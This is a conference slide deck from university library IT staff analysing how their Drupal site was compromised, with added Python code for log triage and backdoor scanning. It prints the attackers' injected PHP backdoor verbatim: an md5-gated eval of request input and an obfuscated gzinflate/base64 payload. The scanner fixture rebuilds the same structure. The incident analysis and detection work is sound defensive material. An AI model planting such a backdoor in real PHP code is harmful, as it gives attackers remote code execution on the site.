Anatomy of a Drupal Hack - TechKnowFile 2014
Graham Stewart
Network and Storage Services Manager
Bilal Khalid
Senior Application Developer
University of Toronto Libraries
ITS at University of Toronto Libraries
=> wide range of services and resources in support of the Library’s role in supporting the research, teaching and learning mission of the university and its community.
=> develop and maintain digital collections and web-based resources
=> upward of 100 web sites, > 200 servers, ~1 PB storage, 56M visits to sites in FY 2012
Photo: Gordon Belray
Not just hardware ...
Collaborative environment between:
- programmers / developers / designers
- librarians
- sysadmins / operations
Technology environment:
- open source tools
- Linux (Ubuntu, Redhat), KVM
… and we’re hiring !
Drupal @UTL
(Architecture diagram) User -> IP -> load balancing: HAProxy / Keepalived (two nodes) -> application and caching: four nodes, each running Varnish, APC, Apache & PHP -> Memcached / Keepalived (two nodes) -> IP -> database: MySQL (two nodes). Storage: shared or rsync.
February 14, 2013
12:10
“Armorial is down!”
12:18
“Update: Armorial down for 1.5 hours, server side issue? maybe caching?”
Symptom or root problem?
Chef?
MySQL error?
Restart Apache?
Restart server?
Recent OS updates?
PHP versions?
Drupal customizations?
Anything updated in Drupal?
Hacked !?#%$&!
Detection
- apache log analysis
- looked for odd traffic patterns
- in particular, isolated all wp-conf requests
- “hack” attempt started a couple of weeks before
- successful injection occurred the day before
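An added example (not from the slides) of the log analysis the Detection slide describes: Python triage over constructed Apache combined-log lines that flags wp-conf probes, PHP requests under sites/default/files, and requests carrying the parameters the injected snippet on the slides keyed on. The IPs, paths and timestamps are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache combined-log format; the constructed sample lines below follow it.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+'
)

# Probes for another CMS's config files have no business on a Drupal site;
# the slides isolated exactly these "wp-conf" requests.
FOREIGN_PROBES = ("wp-conf", "wp-login", "xmlrpc.php")
# The upload directory should only ever serve static files, so a PHP script
# requested there means an uploaded file is being executed.
UPLOAD_DIR = "/sites/default/files/"
PHP_EXT = (".php", ".phtml", ".php5", ".inc")
# Query parameters the injected snippet on the slides keyed on.
BACKDOOR_PARAMS = {"ch", "php_code"}

# Constructed sample: two reconnaissance probes, one hit on an uploaded
# script, one call into the backdoor, one normal page view.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Feb/2013:03:14:05 -0500] "GET /wp-conf.php HTTP/1.1" 404 212
203.0.113.7 - - [01/Feb/2013:03:14:06 -0500] "GET /sites/default/files/wp-conf.php HTTP/1.1" 404 212
198.51.100.20 - - [13/Feb/2013:22:41:10 -0500] "POST /sites/default/files/images/logo.php HTTP/1.1" 200 1583
198.51.100.20 - - [13/Feb/2013:22:41:12 -0500] "GET /index.php?ch=REDACTED&php_code=REDACTED HTTP/1.1" 200 901
192.0.2.55 - - [13/Feb/2013:22:42:00 -0500] "GET /node/42 HTTP/1.1" 200 7734
"""


def classify(line):
    """Return a finding for a suspicious log line, or None for a normal one."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    path = url.path.lower()
    reasons = []
    if any(p in path for p in FOREIGN_PROBES):
        reasons.append("foreign-cms-probe")
    if path.startswith(UPLOAD_DIR) and path.endswith(PHP_EXT):
        reasons.append("php-under-uploads")
    if parse_qs(url.query).keys() & BACKDOOR_PARAMS:
        reasons.append("backdoor-params")
    if not reasons:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"), "method": m.group("method"),
            "path": url.path, "status": m.group("status"), "reasons": reasons}


def triage(lines):
    """Scan log lines; return (findings, findings grouped by client IP)."""
    findings = [f for f in map(classify, lines) if f]
    by_ip = {}
    for f in findings:
        by_ip.setdefault(f["ip"], []).append(f)
    return findings, by_ip


def triage_sample():
    return triage(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for f in triage_sample()[0]:
        print(f["ip"], f["ts"], f["method"], f["path"], f["status"], ",".join(f["reasons"]))
```

Grouping by client IP is what turns isolated probes into the timeline on the slide: the same address probing weeks earlier and then hitting an uploaded script the day before the outage.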
Exploit...
FCKEditor Bug - allows XSS attacks
Sources:
https://drupal.org/node/1482528
http://webcache.googleusercontent.com/search?q=cache:http://exploitsdownload.com/exploit/na/drupal-fckeditorckeditor-php-execution
… + PHP Execution...
PHP Filter Module
- core module that allows ‘client’ PHP execution
- disabled by default
… + Permission issues...
Incorrect rwx permissions for sites/default/files
- allowed user uploaded files to be executable by www-data
- www-data also had write permissions to /var/www!
… = Code Injection
Snippet found inserted at the top of random PHP files throughout the site:
if(isset($_REQUEST['ch']) && (md5($_REQUEST['ch']) == 'edd1d65d726121336405c4d2554df925') && isset($_REQUEST['php_code'])) {
    eval($_REQUEST['php_code']); exit();
}
eval(gzinflate(base64_decode('y0zTyCwuTi3RUIkPcg0MdQ0OiVZPzlCP1VRQU1PQyE0xxZSwtVVQT01JMUwxM00xNzIzNDI0NjYzMTBNNkkxMjU1SUmzNDJVB+vHMLkgoyA+OT8lFWiMpkK1QmpZYg4OaWuF1IrMEg0gXQsA')));
Reversing gzinflate:
Snooping Utility
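An added example (not the authors' tooling) of scanning a docroot for the shape of the injected snippet and reversing its eval(gzinflate(base64_decode())) stage for analyst review, the step the "Reversing gzinflate" slide performs. The infected sample file, its 32-hex key and the packed inner payload are constructed here, not the blob from the slides.

```python
import base64
import os
import re
import tempfile
import zlib

# Signatures taken from the shape of the snippet on the slides: an eval of
# request input behind an md5-compared key, and a packed
# eval(gzinflate(base64_decode('...'))) stage.
SIGNATURES = {
    "request-eval": re.compile(r"eval\s*\(\s*\$_(?:REQUEST|GET|POST|COOKIE)\s*\["),
    "md5-gate": re.compile(
        r"md5\s*\(\s*\$_(?:REQUEST|GET|POST|COOKIE)\s*\[[^\]]+\]\s*\)\s*===?\s*'[0-9a-f]{32}'"),
    "packed-eval": re.compile(
        r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*'([A-Za-z0-9+/=\s]+)'"),
}
PHP_EXT = (".php", ".inc", ".module", ".install", ".phtml")


def unpack_gzinflate(blob):
    """Reverse base64 + PHP gzinflate(): gzinflate is raw DEFLATE, so zlib
    must be told there is no header (wbits=-15)."""
    raw = base64.b64decode(re.sub(r"\s+", "", blob))
    return zlib.decompress(raw, -15).decode("utf-8", "replace")


def scan_file(path):
    with open(path, encoding="utf-8", errors="replace") as fh:
        src = fh.read()
    findings = []
    for sig, rx in SIGNATURES.items():
        for m in rx.finditer(src):
            f = {"file": path, "line": src.count("\n", 0, m.start()) + 1, "sig": sig}
            if sig == "packed-eval":
                try:
                    f["unpacked"] = unpack_gzinflate(m.group(1))
                except (ValueError, zlib.error):
                    f["unpacked"] = None  # keep the hit; an analyst decodes by hand
            findings.append(f)
    return findings


def scan_tree(root):
    """Walk a docroot and collect signature hits in PHP source files."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for n in sorted(names):
            if n.lower().endswith(PHP_EXT):
                findings.extend(scan_file(os.path.join(dirpath, n)))
    return findings


def pack_gzinflate(php):
    """Inverse of unpack_gzinflate; used only to build the constructed sample."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(c.compress(php.encode()) + c.flush()).decode()


# Constructed fixture: same structure as the slide snippet, placeholder key.
INNER = "<?php /* constructed stand-in for the packed second stage */ echo 'stage2'; ?>"
INFECTED = (
    "<?php\n"
    "if(isset($_REQUEST['ch']) && (md5($_REQUEST['ch']) == '0123456789abcdef0123456789abcdef')"
    " && isset($_REQUEST['php_code'])) { eval($_REQUEST['php_code']); exit(); }\n"
    "eval(gzinflate(base64_decode('" + pack_gzinflate(INNER) + "')));\n"
    "// original file contents follow\n"
)


def run_demo():
    """Write one infected and one clean file into a temp tree and scan it."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "infected.php"), "w") as fh:
            fh.write(INFECTED)
        with open(os.path.join(root, "clean.php"), "w") as fh:
            fh.write("<?php echo 'nothing to see'; ?>\n")
        return [(os.path.basename(f["file"]), f["line"], f["sig"], f.get("unpacked"))
                for f in scan_tree(root)]


if __name__ == "__main__":
    for name, line, sig, unpacked in run_demo():
        print(f"{name}:{line} {sig}" + (f" -> {unpacked!r}" if unpacked else ""))
```

Run against a restored site as well as the compromised one: the slides restored from a backup taken two days earlier, and a scan is the cheapest way to confirm the backup predates the injection.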
Risk Exposure
- hijack/deface site
- ransomware => blackmail
- host their own content
- execute phishing attacks
- gain access to other sites on server (if any)
- exploit OS vulnerabilities
Risk Exposure
- use Drupal’s settings.php to gain access to the database/salt
- harvest public/private site content
- access personal user information (including passwords!!)
- access other dbs/sites if they use the same credentials
The Recovery - Restoration
- restored site from a couple of days prior
- all servers are backed up nightly (incl. files and db)
- at most 48 hours of data loss
- correct file-system permissions
- disabled FCKEditor, PHP Filter modules
- reset Drupal admin password
- changed all site users’ passwords
The Recovery - Communication
- contacted all potentially affected site members
- clear, honest communication
- possibility of personal information being leaked
- possibility passwords might have been compromised
- do users use same passwords for other services?
Lessons Learned - Drupal
- first real Drupal problem
- follow Drupal security guidelines!
- https://drupal.org/security/secure-configuration
- vet the required core, contrib and custom modules for project
- stay on top of the updates
- test patches and updates and implement rapidly
- use https for all secure pages (whenever possible)
- install security modules
- Security Review, Security Kit, Login Security, ...
- if developing, use Drupal’s built-in checking functions
Lessons Learned - Operational
- review site security policies
- enforcement: periodic security sweeps
- tight control on production environments
- protect the core code with version control
- use https whenever authentication is involved
- mod_security to block attacks
- establish security analysis practices
- metrics
- traffic analysis
- log triggers and notifications
Embrace Failure
- Failure rarely has a single cause:
- systems are very complex, many interdependencies
- answers are not necessarily obvious
- weakness can be latent, triggered by other flaws
- red herrings
- Swiss cheese
Source: John Allspaw: Advanced PostMortem Fu and Human Error 101
http://www.slideshare.net/jallspaw/advanced-postmortem-fu-and-human-error-101-velocity-2011
Lessons Learned - Cultural
- Everyone must have the organization’s end goals in mind
- Team of experts or team of poly-skilled polyglots?
- Emergency roles may differ from normal roles
- Emergency communication channels must be defined
- Failure rehearsals: deliberately break things
- The culture must be free of blame
Further Information
https://drupal.org/security/secure-configuration
https://drupal.org/writing-secure-code
http://www.cameronandwilding.com/blog/pablo/10-most-critical-drupal-security-risks
http://www.slideshare.net/jallspaw/advanced-postmortem-fu-and-human-error-101-velocity-2011
http://www.kitchensoap.com/
http://arstechnica.com/information-technology/2012/07/netflix-attacks-own-network-with-chaos-monkey-and-now-you-can-too/
Questions?
Thank You
